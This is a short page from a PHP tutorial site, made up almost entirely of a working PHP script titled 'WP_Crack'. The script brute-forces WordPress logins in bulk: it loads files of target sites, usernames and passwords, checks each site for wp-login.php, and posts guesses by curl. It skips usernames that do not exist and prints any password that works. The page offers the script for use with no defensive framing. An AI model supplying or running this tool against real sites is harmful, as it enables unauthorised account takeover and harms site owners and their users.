WP_Crack(批量爆破Wordpress 账户)
- PHP中文网Original
- 2016-05-25 17:06:052023browse
<?php
$HostList = file('url.txt');
$users = file('users.txt');
$Psws = file('pass.txt');
foreach ($HostList as $url)
{
$url = Trim($url);
$PostUrl = $url.'/wp-login.php';
$_Path_status_code = GetHttpStatusCode(Trim($PostUrl));
//echo $PostUrl.' '.$_Path_status_code."\n";
if ('404' == $_Path_status_code)
{
Continue;
}
foreach ($users as $username)
{
$username = Trim($username);
foreach ($Psws as $now)
{
$now = Trim($now);
$curlPost = 'log='.$username.'&pwd='.urlencode($now);
$Rs = POST_Data($PostUrl, $curlPost);
$fail_tag = '<strong>'.$username.'</strong>';
if (stristr($Rs, '<strong>ERROR</strong>: Invalid username')) # 不存在的用户名跳过猜解
{
Break;
}
if (!stristr($Rs, $fail_tag))
{
echo $PostUrl.' '.'Password:'.$now.' # Succed!'."\n";
}
}
}
}
function GetHttpStatusCode($url){
$curl = curl_init();
curl_setopt($curl,CURLOPT_URL,$url);//获取内容url
curl_setopt($curl,CURLOPT_HEADER,1);//获取http头信息
curl_setopt($curl,CURLOPT_NOBODY,1);//不返回html的body信息
curl_setopt($curl,CURLOPT_RETURNTRANSFER,1);//返回数据流,不直接输出
curl_setopt($curl,CURLOPT_TIMEOUT,3); //超时时长,单位秒
curl_exec($curl);
$rtn= curl_getinfo($curl,CURLINFO_HTTP_CODE);
curl_close($curl);
return $rtn;
}
function POST_Data($PostUrl, $DATA)
{
$ch = curl_init();//初始化curl
curl_setopt($ch,CURLOPT_URL, $PostUrl);//抓取指定网页
curl_setopt($ch, CURLOPT_HEADER, 0);//设置header
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);//要求结果为字符串且输出到屏幕上
curl_setopt($ch, CURLOPT_POST, 1);//post提交方式
curl_setopt($ch, CURLOPT_POSTFIELDS, $DATA);
$data = curl_exec($ch);//运行curl
curl_close($ch);
return $data;//输出结果
}
?>
WP_Crack(批量爆破Wordpress 账户)
Statement:
The content of this article is voluntarily contributed by netizens, and the copyright belongs to the original author. This site does not assume corresponding legal responsibility. If you find any content suspected of plagiarism or infringement, please contact admin@php.cn
Previous article:php开发留言板的CRUD(增,删,改,查)操作_php实例Next article:PHP浏览次数统计类visit.class.php配合文本缓存